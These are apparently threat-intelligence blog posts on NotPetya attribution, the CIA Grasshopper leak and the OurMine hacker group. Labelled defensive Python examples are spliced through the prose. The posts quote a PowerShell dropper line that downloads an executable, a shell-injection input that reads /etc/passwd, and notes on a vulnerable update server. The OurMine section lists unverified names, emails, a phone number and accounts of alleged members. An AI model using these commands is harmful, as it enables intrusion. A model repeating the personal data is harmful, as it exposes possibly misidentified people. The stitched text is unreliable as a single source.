NotPetya 2 – Telebots Attribution

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case For Nation State Attribution
Jonathan Nichols
04 JULY 2017

Executive Summary

Compelling data has been collected which demonstrates that the actor group Telebots (Sandworm, Energetic Bear, or BlackEnergy) is behind the #NotPetya (Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C) attack.

Details

Analysts at ESET have painted a compelling picture which demonstrates that the #NotPetya attacks were conducted by the same actors behind the DarkEnergy attacks against the Ukrainian power grid. This analysis uses inductive reasoning and probability to paint a compelling picture. The similarities between the DarkEnergy actors and the NotPetya actors are uncanny to such a degree that it is unlikely that any other actor group could have, accidentally or intentionally, conducted the attack with such striking similarity.

Yesterday I wrote a blog post detailing how the public details of the NotPetya attack were not sufficient to point to an APT. Those facts changed today, July 4th: ESET has published a fantastic report which should remove all but the most cynical of skeptics. Telebots did NotPetya.

A Note on Terminology

The Information Security industry has a problem with terminology. Attackers, viruses, and methodologies are frequently given different names by each industry group as these defenders vie for supremacy in marketing wars. This is an unfortunate state of affairs. Alas, until a NIST standard exists for uniform adversary naming, we must live in the world we’ve got, not the one we wish to inhabit (but seriously NIST, you’re dropping the ball here). For this report, I am calling this specific attack “NotPetya” to be in line with the most important policy authorities I wish this report to reach (NATO), and I’m labeling the actors “Telebots” to be in line with the analysts who conducted the bulk of the research I will be drawing on for this report. In an attempt to be exhaustive (and in a shameless grab at Search Engine Optimization), here is a current list of known industry names for the attackers and the methodologies:

NotPetya: Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C

Telebots: Sandworm, Energetic Bear*, BlackEnergy*

(*source documents vary on whether Telebots/Sandworm are closely related or identical to the BlackEnergy/Energetic Bear group)

A Note on Analysis

It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Due to this immutable fact, it is always good to start with the premise that the hacker you’re analyzing is an idiot. When facts demonstrate this premise to be false, revise the analysis up the food chain until you’ve found a sufficiently complex level of capability to fit the facts. To do otherwise invites trouble for the analyst and the organizations they support. Since all attacks done by idiots can also be done by experts, any analysis which presupposes that the attackers are experts becomes fallacious on its face. You cannot DISPROVE an attack was done by a professional, you can only prove that a professional must have done an attack. A begets B, but B does not always beget A.

[Image: Attribution.png]

Timeline of Events

December 2015: BlackEnergy (related to Telebots) disrupts the Ukrainian power grid
December 2016: KillDisk malware against Ukrainian financials; first instance of fake ransomware used by Telebots to mask a wiper
January 2017: First instance of VPN tunnels used to spread the botnet
January? 2017: Telebots incorporate a password stealer, Mimikatz, and PsExec
14 March 2017, 09:30: PetrWrap (Filecoder.NKH) report from Kaspersky; uses a nearly identical ransom screen
14 April 2017: Backdoor ZvitPublishedObject.dll in M.E.Doc update owned by Telebots
24 April - 10 May 2017: No known backdoors present in M.E.Doc
15 May 2017: New backdoor compiled (Filecoder.AESNI.C, aka XData)
15 May 2017: Backdoor ZvitPublishedObject.dll in M.E.Doc update owned by Telebots
17 May - 21 June 2017: No known backdoors present in M.E.Doc
18 May 2017: Publication of Filecoder.AESNI.C (few infections due to lack of backdoor)
22 June 2017: New backdoor compiled? (wording unclear)
22 June 2017: Backdoor ZvitPublishedObject.dll in M.E.Doc update owned by Telebots
27 June 2017, 10:30 UTC: M.E.Doc update spreads NotPetya (Diskcoder.C)

The timeline above demonstrates a clear evolution in capabilities from early 2016 until today. Early on, Telebots is observed developing the techniques to use fake ransomware to hide a wiper. They then develop the techniques to spread their viruses over VPN tunnels, incorporate password stealers, Mimikatz, and PsExec, and compromise the M.E.Doc update process. All of these techniques are present in the NotPetya attack.

Finding one such technique used by a separate hacking group would be a case of correlation. Finding two would be lucky. Finding so many correlating techniques which fit into a timeline that demonstrates a clear evolution in capabilities? Nature is rarely so beautiful as to grace humanity with that level of coincidence.

As this report was being written, the Ukrainian Cyber Police came to the same conclusion. Like me, they borrow heavily from the wonderful work of the people at ESET. (Source: http://itc.ua/news/glava-kiberpolitsii-ukrainyi-zayavil-chto-razrabotchiki-m-e-doc-znali-problemah-s-bezopasnostyu-zadolgo-ataki-virusa-petya-a-i-mogut-ponesti-ugolovnuyu-otvetstvennost-za-halatnost/)

If you see ESET at a conference, be sure to buy them a beer and thank them for their service to the Western world.

Sources:
https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
https://securelist.com/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/77762/
https://securelist.com/schroedingers-petya/78870/

NOTE: I’m doing this on my own free time and without assistance. Please forgive and alert me to any errors, both factual and editorial. If you want a Threat Intelligence analyst on your team, just drop me a line. I would have been happy to have shared this work with a team, with an editor, and under the banner of a team logo.

NotPetya – So Easy Anyone Could Do It

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case Against Nation State Attribution
Jonathan Nichols
03 JULY 2017

“Never attribute to malice that which is adequately explained by stupidity” – Hanlon’s Razor

Executive Summary

The NATO Cooperative Cyber Defence Center of Excellence states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. To date, the principal compelling reason for security researchers to believe that the NotPetya attacks were conducted by a nation state relates to the use of M.E.Doc automatic software updates in order to seed the NotPetya virus. Outside of this element, researchers have demonstrated multiple elements of this attack which are amateurish, or otherwise unlike behavior typically seen in nation state level threats. New evidence suggests that the malicious abuse of M.E.Doc would be trivial for non-state actors. This report attempts to review NATO’s claim that the attacks are likely to be attributed to a nation state actor by tackling the known public evidence about each of these attack vectors. While many of NATO’s claims are disputed by community experts, the claims are taken here with the seriousness one should give an entity that could trigger Article 5 (war).

NATO Claim – Drive by, Software Updates, and Phishing

The NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) states that the “global outbreak of NotPetya malware on 27 June 2017 […] can most likely be attributed to a state actor.” (Source: https://ccdcoe.org/notpetya-and-wannacry-call-joint-response-international-community.html) The CCD COE report of 30 June 2017 cites the attack as “complex and expensive enough” to rule out a non-state actor, and states that the ransom collected would not have covered the cost of the operation.

NATO states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. Of these attack vectors, most security researchers highlight the compromised software updates as being evidence of nation state involvement.

Compromised Software Updates – So Easy Anyone Could Do It

Ukrainian Cyber Police have published that at about 10:30 am GMT Tuesday (27 July 2017) M.E.Doc software on client machines ran a routine automatic update. At that time, the service EZVit.exe connected to address 92.60.184.55 with User Agent “medoc1001189” and downloaded 333 kilobytes of data (Source: https://www.facebook.com/cyberpoliceua/posts/536947343096100). This event was the initial virus download.

Hacking 92.60.184.55

Further analysis of 92.60.184.55 shows that, at the time of this writing (03 JULY 2017 at 0948 EST), the server at 92.60.184.55 has the following services open:

Port 21 – ProFTPD Version 1.3.4c
Port 22 – OpenSSH Version 5.4p1
Port 80 – nginx Version 1.2.7

(Source: https://www.shodan.io/host/92.60.184.55)

Notably, this ProFTPD version is vulnerable to CVE-2015-3306, which allows for trivial exploitation to read and write files on the hard drive (source: https://www.cvedetails.com/cve/CVE-2015-3306/). This exploit is also a Metasploit module. Further testing or forensics would be necessary to establish that this was the vulnerability used, and this analysis is not attempting to claim with any certainty that CVE-2015-3306 was definitively the malicious attack vector. Nonetheless, the trivial nature of this attack is such that any hacker with rudimentary capabilities could exploit it if mod_copy was enabled. With trivial access to write to the hard drive, a rudimentary hacker could re-write files without difficulty.

The potential for trivial attacks is not limited to this one exploit. Multiple exploits exist for all of these services, and any number of them could have been used by non-state actors with little to no experience in hacking. The publicly known vulnerabilities for the open ports are as follows:
ProFTPD: https://www.cvedetails.com/product/16873/Proftpd-Proftpd.html?vendor_id=9520
OpenSSH: http://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/Openbsd-Openssh.html
nginx: http://www.cvedetails.com/vulnerability-list/vendor_id-10048/product_id-17956/Nginx-Nginx.html

Getting the Clients to Download the Virus

In the course of this investigation, it was discovered that simply sending an HTTP GET request to 92.60.184.55 on port 80 with the User Agent “medoc1001189” will result in the server sending a “download” file. This strongly suggests that no authentication was/is required by M.E.Doc software to receive updates. It is probable that any file downloaded in this manner will be executed by the M.E.Doc auto-updater. In this manner, simply writing a virus to the download file may result in the execution of the virus on any M.E.Doc client machine.
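The security-relevant point in the paragraph above is that the update channel neither authenticated the client nor, apparently, let the client verify what it received before running it. The following is an added example (not the page's or M.E.Doc's code) of the check an auto-updater should perform before executing a downloaded file: the client holds a manifest of expected file hashes, checks the manifest's own authentication tag, and refuses anything that does not match. The key, manifest layout, file name "download", and the update bodies are all constructed for the example; a real updater would use the vendor's public-key signature where this one uses an HMAC, since the standard library has no signature primitive.

```python
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed stand-in for the update publisher's key. In a real updater this
# would be an asymmetric signing key held only by the vendor, with the client
# holding just the public half; HMAC is used here so the example runs on the
# standard library alone.
PUBLISHER_KEY = b"constructed-demo-key-not-a-real-secret"


def sign_manifest(manifest: dict, key: bytes = PUBLISHER_KEY) -> Tuple[bytes, str]:
    """Serialise the manifest canonically and compute its authentication tag."""
    body = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return body, tag


def verify_manifest(body: bytes, tag: str, key: bytes = PUBLISHER_KEY) -> Optional[dict]:
    """Return the parsed manifest only if its tag checks out, otherwise None."""
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(body)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def stage_update(name: str, payload: bytes, manifest_body: bytes, tag: str) -> str:
    """Decide whether a downloaded file may be executed.

    Returns "execute" or a "reject: ..." reason. Nothing here executes anything;
    the decision is made before the file is ever handed to the OS.
    """
    manifest = verify_manifest(manifest_body, tag)
    if manifest is None:
        return "reject: manifest tag does not verify"
    expected = manifest.get("files", {}).get(name)
    if expected is None:
        return f"reject: {name} is not listed in the manifest"
    if not hmac.compare_digest(sha256_hex(payload), expected):
        return "reject: payload hash does not match manifest"
    return "execute"


# --- constructed sample data (not real update content) -----------------------
GOOD_UPDATE = b"MZ constructed benign update body"
TAMPERED_UPDATE = b"MZ constructed payload swapped in on the update server"

MANIFEST = {"version": "1.0.0-demo", "files": {"download": sha256_hex(GOOD_UPDATE)}}
MANIFEST_BODY, MANIFEST_TAG = sign_manifest(MANIFEST)


def demo() -> dict:
    """Run the three cases a defender cares about and return the verdicts."""
    # An attacker who can write the update file but not re-sign the manifest
    # can at best try to edit the hash in the manifest body, which breaks the tag.
    forged_body = MANIFEST_BODY.replace(
        sha256_hex(GOOD_UPDATE).encode(), sha256_hex(TAMPERED_UPDATE).encode())
    return {
        "good": stage_update("download", GOOD_UPDATE, MANIFEST_BODY, MANIFEST_TAG),
        "tampered_payload": stage_update("download", TAMPERED_UPDATE, MANIFEST_BODY, MANIFEST_TAG),
        "forged_manifest": stage_update("download", TAMPERED_UPDATE, forged_body, MANIFEST_TAG),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {verdict}")
```

The point of the three cases is that write access to the update server, which is all the paragraph above requires of an attacker, is no longer enough on its own: the swapped file fails the hash check, and editing the manifest to match fails the tag check, so the client only ever executes what the publisher's key vouched for.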

Compromised Software Updates – Conclusion

The attack, as described by security researchers, NATO, and Ukrainian Cyber Police, is not sufficiently complex to have necessarily been conducted by a nation state actor. To the contrary, the techniques described above use tools standard in Kali Linux, a free operating system favored as an introductory hacker toolkit.

Drive-by Attack

The drive-by attack described by NATO CCD COE best matches the description of NotPetya being delivered via a fake Microsoft Windows update pop-up on bahmut.com.ua/news. (Source: https://news.zepko.com/petya-ransomware-cyberattack-on-european-businesses-and-infrastructure/). While some security experts disagree, the website owners themselves have stated that the website utilized a malicious pop-up (http://bahmut.com.ua/news/incidents/4936-vecherniy-bahmut-tozhe-postradal-ot-hakerskoy-ataki.html). Pop-ups are routinely blocked by most modern browsers and are not the preferred infection vector for advanced drive-by actors. Further, delivering fake Windows updates in pop-up browser windows is behavior not typically associated with advanced actors. This behavior is usually observed in actors with a criminal motive in malvertising campaigns, which tend to target illicit video streaming services. Advanced actors would likely attempt more successful browser infections, and would resist the use of this type of pop-up. This attack, like the software update attack, betrays the work of an unskilled hacker, and not the work of a nation state.

Phishing

The phishing attack described by the NATO CCD COE best matches the description of phishing emails delivering the NotPetya virus through a Word document attachment (Source: https://support.threattracksecurity.com/support/solutions/articles/1000251572-goldeneye-peyta-technical-analysis). Again, some security experts dispute this claim (https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759). Taking NATO at their word, this attack appears to use Order-20062017.doc to leverage CVE-2017-0199, which calls the following PowerShell: “PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘C:\Documents and Settings\Administrator\Application Data\[random_number.exe’);”

Researchers have complained that this research is not replicable. This is potentially because french-cooking.com is no longer accessible. As of this writing, respectable research organizations such as Booz Allen Hamilton (https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf) assess myguy.exe to be a potential dropper for NotPetya. Should this analysis change, it only reduces the complexity of the NotPetya attack. A reduction in complexity will only further reduce the probability that the attack is the work of a nation state.
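Whatever the attribution, the one-liner quoted above is a textbook pattern for a detection engineer: an Office process spawning PowerShell with a hidden window and a WebClient download to a user-writable path. The following is an added example (not from the page or any of the cited reports) of that detection logic run over constructed process-creation records; the log layout, the parent/image names, the URL example.invalid/stage2.exe, and the destination path are all made up for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation records (not real telemetry), in a
# simplified "timestamp|parent image|image|command line" layout.
SAMPLE_LOGS = [
    "2017-06-27T10:31:02|WINWORD.EXE|powershell.exe|"
    "PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient)"
    ".DownloadFile('http://example.invalid/stage2.exe', "
    "'C:\\Users\\alice\\AppData\\Roaming\\48213.exe')",
    "2017-06-27T10:35:10|explorer.exe|powershell.exe|"
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    "2017-06-27T10:36:44|OUTLOOK.EXE|powershell.exe|"
    "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "2017-06-27T10:40:00|cmd.exe|powershell.exe|"
    "powershell (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
]

OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_RE = re.compile(
    r"WebClient\)?\.Download(?:File|String)\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
DEST_RE = re.compile(
    r"DownloadFile\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+\S+", re.I)


def score_record(record: str) -> Optional[Dict[str, object]]:
    """Return a finding for one record, or None if nothing suspicious matched."""
    ts, parent, image, cmd = record.split("|", 3)
    if image.lower() != "powershell.exe":
        return None
    reasons: List[str] = []
    if parent.upper() in OFFICE_PARENTS:
        reasons.append("office-parent")        # Word/Outlook spawning PowerShell
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden-window")        # -WindowStyle Hidden / -w hidden
    download = DOWNLOAD_RE.search(cmd)
    if download:
        reasons.append("webclient-download")   # WebClient.DownloadFile/DownloadString
    if ENCODED_RE.search(cmd):
        reasons.append("encoded-command")      # -enc / -EncodedCommand
    if not reasons:
        return None
    dest = DEST_RE.search(cmd)
    return {
        "time": ts,
        "parent": parent,
        "reasons": reasons,
        "url": download.group(1) if download else None,
        "dest": dest.group(1) if dest else None,
        # Two or more independent indicators on one process creation is the
        # combination the quoted one-liner exhibits; one alone is only a lead.
        "severity": "high" if len(reasons) >= 2 else "low",
    }


def scan(records: List[str]) -> List[Dict[str, object]]:
    """Run score_record over every record and keep the findings."""
    return [f for f in (score_record(r) for r in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

Each indicator on its own is noisy (admins run hidden PowerShell from scheduled tasks all the time), which is why the example only raises severity when several coincide on one process creation, and why it pulls out the URL and destination path so the analyst has something to block or hunt on rather than just an alert.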

Regardless, the threattracksecurity report is the only professional report which matches the details of the NATO CCD COE report. Threattracksecurity has published the following phishing email:

“TO: target.emailName
FROM: Random_Name@outlook.com
REPLY-TO: christian.malcharzik@gmail.com

ATTACHMENT: Order-20062017.doc
BODY:

Hello target.emailName,
You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is ex. 6089, 6088

With appreciation!
Prince”

This phishing email is rudimentary, at best. There are no hallmarks here of advanced phishing techniques, and no indication that the email specifically targeted any user. To the contrary, the use of automated variables is indicative of a rudimentary hacker and betrays none of the qualities expected from nation state level adversaries.

The NotPetya Virus – Malice or Idiocy?

Much has been made about the fact that the NotPetya virus appears to have been designed as a wiper, and not as a genuine piece of ransomware. The virus also checks for avp.exe (Kaspersky Antivirus) and then wipes the bootsector of any device with the file present. (Source: https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf)  In the course of running, the virus wipes the Master Boot Record, reboots the machine, encrypts the machine, writes a decryption key to readme.txt file on the C drive, then displays a ransom message.

The ransom message itself contains a decryption key which is entirely randomly generated and is not the encryption key written to readme.txt! The virus either accidentally or maliciously writes over its own ability to decrypt itself. This behavior is being attributed to malice on the part of the designer. However, what has been attributed to malice could just as easily be attributed to poor coding. Why would a coder write one ransom message and decryption key to readme.txt and then generate a random fake decryption key for an entirely new ransom message to be displayed to the user? This duplication of effort is not the sign of a professional nation state adversary. It is entirely plausible, and within the confines of Hanlon’s Razor, that the actors are so amateur as not to know that the ransomware module they used had already written a ransom message to readme.txt. Further, the specific targeting of Kaspersky Antivirus hearkens back to the vindictive nature of low-level cyber criminals, such as those who famously write hate messages to Kaspersky and Brian Krebs regularly.

$10,000 – Not Enough Cash to be Worth the Effort?

As of this writing, the Bitcoin wallet used for this attack contains $10,092.15, or 3.99 BTC at the current exchange rate (Source: https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX). While this is not a significant windfall for nation state actors, it would be a sizable return for an actor observed using only a few days’ worth of effort and a handful of known vulnerabilities. Without evidence of sufficient technical complexity, it seems inappropriate to assess $10,000 for a weekend’s worth of work as “Not worth it” to any moderately capable individual or small group. This is especially true if the actor comes from a country with a low GDP.

Conclusions

There is not sufficient evidence in the current publicly available corpus of knowledge to state that this attack must have been conducted by a nation state actor. No publicly known data point demonstrates a demand for skills above those of a 400 lb hacker with a small amount of cash and a copy of Kali Linux.

However, the inability to find data which confirms that the attack was necessarily a nation state does not preclude the possibility that the attack was a nation state. It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Complexity in future reports may, over time and with more robust forensics, demonstrate that this was an APT. However, at this time, there is not sufficient public data to prove that is the case.

Stories are running rampant that NATO is debating whether to consider this attack an act of war. (Source: http://gizmodo.com/nato-considering-petya-malware-potential-act-of-war-1796590694) We should urge moderation and accuracy in our analysis. I, for one, have a distaste for wars started on faulty premises.

-Jon (@WvuAlphaSoldier)

NOTE: I’m doing this on my own free time and without assistance. Please forgive and alert me to any errors, both factual and editorial. If you want a Threat Intelligence analyst on your team, just drop me a line. I would have been happy to have shared this work with a team, with an editor, and under the banner of a team logo.

BONUS FLOW CHART! (Seriously, I need a copy of Visio….)

[Image: PetyaFlow chart]

What is Grasshopper? -A Wikileaks Vault7 Story

It’s that time again. Wikileaks has published another set of documents allegedly stolen from the CIA. This time, the documents detail the use of a tool named Grasshopper. Let’s try to get ahead of the media cycle and explain, in plain English, what Grasshopper is.

“Grasshopper appears to be a .exe builder which simplifies the process of identifying and deploying malicious code on a target machine.”

Source: https://wikileaks.org/vault7/document/Grasshopper-v2_0_2-UserGuide/page-6/#pagination

What does that mean? Essentially, Grasshopper automates the process of developing an executable file which will run on a victim machine. This isn’t special. Any child hacker will know that Metasploit will do this for you, for free, without having to join the CIA or anything! If you’re so inclined, you can totally pretend you’re a superspy, here: https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

Building an executable by hand is tough, but with an executable builder, it’s super easy! Just pick the victim from a list, identify what is running on the victim machine, and a menu will guide you through the process of identifying the right Vulnerabilities, Exploits, and Payloads you can use against that machine. It’s Hacking for Dummies! No more messy “learning how to code” needed!

To go into detail, we gotta get technical. I have to explain to you a bit about the fundamentals of malware. For malware to work, you need to have a Vulnerability, an Exploit, and a Payload.

Vulnerability: A flaw in a piece of code. These are usually accidentally introduced by programmers. After one too many late night coding sessions, a coder inadvertently misplaces a semi-colon, or forgets to sanitize a user input. Let’s say a programmer for some server made a user login page without any basic sanity checks and it looks kinda like this:

Technical bits:
UserInput{
$USERNAME&&$PASSWORD
SUBMIT;
}

(Note to coders: I know! Don’t write me. Trying to keep this basic.)

Exploit: This is the code that leverages the vulnerability. Let’s look at the above function. A hacker may write a script that takes advantage of the lack of input sanitization. Instead of entering the user name, the hacker may write something like ;cat /etc/passwd. Let me break it down:

Technical bits:
; = “ESCAPE!”
cat = “DISPLAY”
/etc/passwd = “the file containing all the passwords for this machine.”

So when that UserInput function above is run, the computer sees:
USERINPUT…ESCAPE!…. DISPLAY PASSWORD FILE.

Next thing you know, the hacker has your password file.
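The reason the ; trick works is that the login handler glued the user's text into a command line and let a shell parse it. The following is an added example (not code from the page or from the Grasshopper documents) showing, in Python, the two halves of the fix: tokenising the naive command line the way a shell would, so you can see exactly where the ; splits it, and then passing the same input as a single argument with no shell involved, where it stays inert. The getent passwd command string and the username allowlist are constructed for the example; nothing in it is executed through a shell.

```python
import re
import shlex
import subprocess
import sys
from typing import List

# Allowlist for the username field; anything outside it is rejected before the
# value goes anywhere near a command line. (Constructed policy for the example.)
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def shell_tokens(username: str) -> List[str]:
    """Show how a POSIX shell would split the naive handler's command line.

    The command string is a constructed stand-in for the page's UserInput
    handler; it is tokenised, never executed.
    """
    cmdline = f"getent passwd {username}"
    lexer = shlex.shlex(cmdline, punctuation_chars=True)  # ';' becomes its own token
    return list(lexer)


def argv_lookup(username: str) -> str:
    """Pass the value as one argv element: no shell parses it, so ';' is data.

    The child process is the Python interpreter echoing its first argument,
    standing in for the real lookup tool so the example runs anywhere.
    """
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", username],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


def is_valid_username(username: str) -> bool:
    """Allowlist check: the first line of defence, before any command is built."""
    return USERNAME_RE.match(username) is not None


def quoted_for_shell(username: str) -> str:
    """If a shell really is unavoidable, quote the value so it stays one word."""
    return shlex.quote(username)


if __name__ == "__main__":
    hostile = ";cat /etc/passwd"
    print("shell would see:", shell_tokens(hostile))
    print("argv child saw :", argv_lookup(hostile))
    print("allowlist says :", is_valid_username(hostile))
    print("quoted form    :", quoted_for_shell(hostile))
```

The argv form is the real fix: the operating system receives an array of arguments, so there is no parser left for the ; to talk to. The allowlist and shlex.quote are belt-and-braces for the cases where the value is later handed to something that does parse strings.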

Payload: This is the part that most people traditionally think of as “malware.” This could be nearly anything, and is somewhat dependent on the type of vulnerability. A vulnerability which allows for root level remote code execution can run most anything; a vulnerability which only allows a hacker to read the contents of memory won’t allow for any code execution. If the vulnerability allows for local code execution, you can execute the payload locally (while sitting at the machine). If the vulnerability allows for remote code execution, you can run the payload remotely against the vulnerable machine sitting on the internet. A hacker’s payload could be wipers (things that erase a hard drive, like what the Iranians have been deploying against the Saudis), ransomware (famously being deployed against hospitals), trojans (used to allow a hacker to gain remote access), keyloggers (usually deployed by parents or jealous former lovers), or even just everyday spambots (used to try to sell you garbage).

SO YOU WANNA BE A HACKER SPY….

1) Apply at CIA.gov
2) Go through years of rigorous training
3) Pass an insane background check
4) Get specialized training for Grasshopper
5) Deploy to a crappy part of the world
6) Find a target machine
7) Identify what is running on that machine
8) Using a set of easily navigated menus, use Grasshopper to select what type of Windows machine the victim has, then select a vulnerability likely to work against the victim, then select what kind of payload you want to run on the machine. Save a copy of Totally_Not_Spying.exe
9) Sneak in and run Totally_Not_Spying.exe on the target machine
10) Try to escape without getting charged for espionage and beheaded by some cut-rate dictator

OR….just watch this Youtube video:

That’s right, kids! All the functionality Wikileaks just told you the CIA has…..yep…you have it too. Just download Metasploit and follow one of the innumerable guides posted on YouTube and, just like that, you’ve skipped all that difficult polygraph stuff the CIA would have made you do!

A note on Wikileaks

Thus far, Wikileaks’ #Vault7 dumps have failed to impress. No one should be surprised that the CIA hacks targets. Most Americans would rightly be upset if the CIA stayed in the stone age.

I continue to wait for Wikileaks to demonstrate something spectacular. Do they have evidence that the CIA engages in bulk data collection? Do they have evidence that the CIA has been holding onto critical bugs (like a Heartbleed-level vulnerability)? No? Or maybe they do, but haven’t published it yet. THOSE would be notable. To date, Wikileaks has only demonstrated that spies sometimes spy. This isn’t remarkable, and neither are the techniques they’ve demonstrated, to date.

Until next time! Bye for now!

-Jonathan Nichols
@WvuAlphaSoldier

Our Mine Team

(Originally Authored on July 27th, 2016)

Much media attention has been paid to “OurMine Team”, a group of hackers who have been on a recent hacking spree of high profile accounts. Those attacked include Daniel Ek (CEO of Spotify), Mark Zuckerberg, Channing Tatum, former Twitter CEOs Dick Costolo and Ev Williams, Twitter co-founder Biz Stone, and YouTubers Pewdiepie, Markiplier, Deadmau5, and David Guetta. The group claims to be security researchers who are hacking these accounts to demonstrate vulnerabilities. The group has set up a website at ourmine.org/services/ which sells services for $30 to $5,000.

This group is well known to researchers. The group was founded in 2014 as a group of low-level Saudi Arabian hackers playing on the OurMine Minecraft forums. The group gained attention in July 2015 when they conducted DDoS attacks against a number of financial institutions. Before then, @Our_Mine was known for taking over the accounts of gamers, stealing over 2,000 Euros worth of PS4 FIFA coins (used for in-game purchases). The group is believed to be relatively unskilled. In 2015, the group was observed on HackForum.net attempting to pay for Instagram account takeovers. The group is believed to likely be using off-the-shelf low-level hacking tools in their attacks.

The group also has a “theme song” of considerable production quality, which can be found here: https://www.youtube.com/watch?v=pU6Nq1aYmLA. The song appears to have been sung by Lindee Link, a song writer from Georgia, USA.

The following is unverified PII for the OurMine Team.

Related Accounts:

http://twitter.com/Our_Mine

http://twitter.com/ourmine_team

https://twitter.com/TheOurMineTeam

Member: Snake

Name: Abdulhakeem Zatar

Instagram: https://www.instagram.com/zatar96/

Youtube: https://www.youtube.com/user/TheSnakeReloaded

IMAGE: https://pbs.twimg.com/media/CJk1-rNWcAA6TGu.png

Twitter: https://www.twitter.com/Zatar_96

Whois information: http://whois.domaintools.com/our-mine.org Admin Name: OurMine Snake

Member: A_Body

Name: Alsheikh Ahmed

Google+: https://plus.google.com/115054847230006118612/about

Email: abody.m.1986@gmail.com

Skype: Alsheikh.Ahmed3

Location: Saudi Arabia

Facebook: /alsheikh.ahmed.3

Website: abody4sex.com

Member: Makki

Name: Ahmad Makki

Skype: a.m.bukari

Location: Saudi Arabia

Instagram: @0AhmadMakki0

Facebook: /ahmad.adnan.3990

Phone: +966.0540087109

Email: shopmakki@gmail.com

Related websites

OurMine.info

OurMine.me

OurMine.org

Our-Mine.org

Related Pastebin entries:

http://pastebin.com/search?q=Dox+OurMine

http://pastebin.com/eBAA8eNV

http://pastebin.com/shGM89Sd

http://pastebin.com/PaC877aG

Additional Sources:
https://forum.hivemc.com/threads/phishing-links-and-false-staff-accounts.60696/page-10
http://qz.com/700043/nobody-likes-the-hackers-who-broke-into-mark-zuckerbergs-twitter-account/
http://www.techworm.net/2016/06/meet-ourmine-hackers-targeting-tech-elite.html